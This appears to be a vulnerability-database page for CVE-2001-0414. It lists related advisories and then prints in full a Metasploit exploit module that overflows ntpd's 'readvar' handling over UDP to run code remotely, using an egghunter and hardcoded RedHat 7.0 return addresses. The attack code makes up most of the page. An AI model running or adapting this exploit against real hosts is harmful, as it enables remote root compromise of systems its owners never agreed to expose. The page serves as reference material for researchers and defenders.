| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
| CVE-2001-0414 | 25 Aug 201000:00 | ā | circl | |
| NTP Vulnerability | 8 May 200216:00 | ā | cisco | |
| NTP Vulnerability - Cisco Systems | 1 Sep 201000:00 | ā | nessus | |
| Cisco NTP ntpd readvar Variable Remote Overflow (CSCdt93866) | 5 Jun 200200:00 | ā | nessus | |
| Debian DSA-045-2 : ntpd - remote root exploit | 29 Sep 200400:00 | ā | nessus | |
| Mandrake Linux Security Advisory : ntp (MDKSA-2001:036) | 6 Sep 201200:00 | ā | nessus | |
| Network Time Protocol Daemon (ntpd) readvar Variable Overflow RCE | 10 Apr 200100:00 | ā | nessus | |
| CVE-2001-0414 | 18 Sep 200104:00 | ā | cve | |
| CVE-2001-0414 | 18 Sep 200104:00 | ā | cvelist | |
| NTPd 4.0.99j-k readvar - Remote Buffer Overflow (Metasploit) | 4 Apr 200100:00 | ā | exploitdb |
##
# $Id: ntp_overflow.rb 10150 2010-08-25 20:55:37Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = GoodRanking
include Msf::Exploit::Remote::Udp
include Msf::Exploit::Remote::Egghunter
def initialize(info = {})
super(update_info(info,
'Name' => 'NTP daemon readvar Buffer Overflow',
'Description' => %q{
This module exploits a stack based buffer overflow in the
ntpd and xntpd service. By sending an overly long 'readvar'
request it is possible to execute code remotely. As the stack
is corrupted, this module uses the Egghunter technique.
},
'Author' => 'patrick',
'License' => MSF_LICENSE,
'Version' => '$Revision: 10150 $',
'References' =>
[
[ 'CVE', '2001-0414' ],
[ 'OSVDB', '805' ],
[ 'BID', '2540' ],
[ 'US-CERT-VU', '970472' ],
],
'Payload' =>
{
'Space' => 220,
'BadChars' => "\x00\x01\x02\x16,=",
'StackAdjustment' => -3500,
'PrependEncoder' => Metasm::Shellcode.assemble(Metasm::Ia32.new, "xor eax,eax mov al,27 int 0x80").encode_string, # alarm(0)
'Compat' =>
{
'ConnectionType' => '-reverse',
},
},
'Platform' => [ 'linux' ],
'Arch' => [ ARCH_X86 ],
'Targets' =>
[
[ 'RedHat Linux 7.0 ntpd 4.0.99j', { 'Ret' => 0xbffffbb0 } ],
[ 'RedHat Linux 7.0 ntpd 4.0.99j w/debug', { 'Ret' => 0xbffff980 } ],
[ 'RedHat Linux 7.0 ntpd 4.0.99k', { 'Ret' => 0xbffffbb0 } ],
#[ 'FreeBSD 4.2-STABLE', { 'Ret' => 0xbfbff8bc } ],
[ 'Debugging', { 'Ret' => 0xdeadbeef } ],
],
'Privileged' => true,
'DisclosureDate' => 'Apr 04 2001',
'DefaultTarget' => 0))
register_options([Opt::RPORT(123)], self.class)
end
def exploit
hunter = generate_egghunter(payload.encoded, payload_badchars, { :checksum => true })
egg = hunter[1]
connect_udp
pkt1 = "\x16\x02\x00\x01\x00\x00\x00\x00\x00\x00\x016stratum="
pkt2 = "\x16\x02\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00"
sploit = pkt1 + make_nops(512 - pkt1.length)
sploit[(220 + pkt1.length), 4] = [target['Ret']].pack('V')
sploit[(224 + pkt1.length), hunter[0].length] = hunter[0]
print_status("Trying target #{target.name}...")
print_status("Sending hunter")
udp_sock.put(sploit)
select(nil,nil,nil,0.5)
print_status("Sending payload")
udp_sock.put(pkt1 + egg)
select(nil,nil,nil,0.5)
print_status("Calling overflow trigger")
udp_sock.put(pkt2)
select(nil,nil,nil,0.5)
handler
disconnect_udp
end
endData
Build on a solid foundation withĀ Vulners data
WeĀ provide theĀ essential building blocks forĀ cybersecurity solutions withĀ comprehensive, structured, andĀ constantly updated vulnerability andĀ exploits data
Api
Power your application withĀ Vulners API
The Vulners REST API offers reliable, high-performance access toĀ vulnerabilityĀ intelligence, withĀ 99.9%Ā SLAĀ uptime andĀ CDN-backed data delivery forĀ seamlessĀ global access
App
Assess and manage vulnerabilities withĀ VulnersĀ tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation